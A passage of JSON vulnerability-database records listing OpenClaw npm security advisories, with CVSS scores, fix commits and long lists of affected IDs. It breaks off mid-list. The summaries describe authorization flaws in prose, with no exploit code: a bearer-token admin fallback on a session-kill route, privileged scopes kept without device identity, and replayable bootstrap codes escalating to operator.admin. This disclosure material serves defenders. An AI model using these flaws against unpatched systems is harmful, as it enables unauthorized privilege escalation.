`0ed4f8a72bb140045962e97ab01c94c076b758a4` — 2026-03-31T22:52:55+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/0ed4f8a72bb140045962e97ab01c94c076b758a4","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/0ed4f8a72bb140045962e97ab01c94c076b758a4"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-w85g-3h6x-4xh2","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-w85g-3h6x-4xh2"},{"reference_url":"https://github.com/advisories/GHSA-w85g-3h6x-4xh2","reference_id":"GHSA-w85g-3h6x-4xh2","reference_type":"","scores":[{"va
lue":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-w85g-3h6x-4xh2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnera
bility":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnera
bility":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["GHSA-w85g-3h6x-4xh2"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-38g8-39ek-xbat"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91639?format=json","vulnerability_id":"VCID-3bdd-a9nw-13bn","summary":"OpenClaw: Gateway HTTP /sessions/:sessionKey/kill Reaches Admin Kill Path Without Caller Scope Binding\n## Summary\n\nGateway HTTP /sessions/:sessionKey/kill Reaches Admin Kill Path Without Caller Scope Binding.\n\n## Details\n\nThe HTTP route previously treated any bearer-authenticated request as admin-eligible and could reach the admin kill path without binding the action to requester ownership or caller-granted operator scopes. 
The fix removes the bearer-token admin fallback and keeps remote session kills on the local-admin or requester-owned path only.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/02cf12371f9353a16455da01cc02e6c4ecfc4152","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/02cf12371f9353a16455da01cc02e6c4ecfc4152"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9p93-7j67-5pc2","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9p93-7j67-5pc2"},{"reference_url":"https://github.com/advisories/GHSA-9p93-7j67-5pc2","reference_id":"GHSA-9p93-7j67-5pc2","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9p93-7j67-5pc2"}],"fixed_packages":[],"aliases":["GHSA-9p93-7j67-5pc2"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3bdd-a9nw-13bn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91121?format=json",
"vulnerability_id":"VCID-3pqp-bneb-mbc4","summary":"OpenClaw's Trusted-proxy Control UI sessions retain privileged scopes without device identity on device-less allow paths\n## Summary\nTrusted-proxy Control UI sessions without device identity could retain self-declared privileged scopes on the device-less allow path.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `ccf16cd8892402022439346ae1d23352e3707e9e`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/gateway/server/ws-connection/message-handler.ts now strips unbound self-declared scopes on the trusted-proxy no-device path.\n- src/gateway/server/ws-connection/connect-policy.ts remains the allow path, but the shipped scope scrub prevents privilege retention without device identity.\n\nOpenClaw thanks @nexrin for 
reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ccf16cd8892402022439346ae1d23352e3707e9e","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/ccf16cd8892402022439346ae1d23352e3707e9e"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-48vw-m3qc-wr99","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-48vw-m3qc-wr99"},{"reference_url":"https://github.com/advisories/GHSA-48vw-m3qc-wr99","reference_id":"GHSA-48vw-m3qc-wr99","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-48vw-m3qc-wr99"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vuln
erability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vuln
erability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vuln
erability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vuln
erability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vuln
erability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["GHSA-48vw-m3qc-wr99"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3pqp-bneb-mbc4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91198?format=json","vulnerability_id":"VCID-3qbe-dsde-p7dz","summary":"OpenClaw bootstrap setup codes could be replayed to escalate pending pairing scopes before approval\n### Summary\n`openclaw` versions `<= 2026.3.12` allowed bootstrap setup codes to be replayed before approval, which could widen the scopes on a pending device pairing request.\n\n### Affected Packages / Versions\n- Package: `openclaw` (`npm`)\n- Affected versions: `<= 2026.3.12`\n- Fixed version: `2026.3.13`\n\n### Details\nThe vulnerable path was bootstrap token verification in `src/infra/device-bootstrap.ts`. In affected releases, a valid bootstrap setup code could be verified more than once before the pairing request was approved. That allowed a second verification attempt to mutate a pending device pairing and request broader scopes, including escalation from a lower operator scope to `operator.admin`, before an approver finalized the pairing.\n\nThis issue is in scope under OpenClaw's trust model because bootstrap setup codes are an authentication primitive for device pairing and the replay changed the privileges granted to the pending device.\n\n### Fix\n`openclaw@2026.3.13` makes bootstrap setup codes single-use. 
Current code consumes the bootstrap token record on the first successful verification, so replay attempts fail before pending scopes can be widened.\n\nRegression coverage exists in `src/infra/device-pairing.test.ts` (`rejects bootstrap token replay before pending scope escalation can be approved`).\n\n### Fix Commit(s)\n- `1803d16d5cec970c54b0e1ac46b31b1cbade335c`\n\nThanks @tdjackey for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/1803d16d5cec970c54b0e1ac46b31b1cbade335c","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/1803d16d5cec970c54b0e1ac46b31b1cbade335c"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-63f5-hhc7-cx6p","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-63f5-hhc7-cx6p"},{"reference_url":"https://github.com/advisories/GHSA-63f5-hhc7-cx6p","reference_id":"GHSA-63f5-hhc7-cx6p","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-63f5-hhc7-cx6p"}],"fixed_packag
es":[{"url":"http://public2.vulnerablecode.io/api/packages/113139?format=json","purl":"pkg:npm/openclaw@2026.3.13","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97f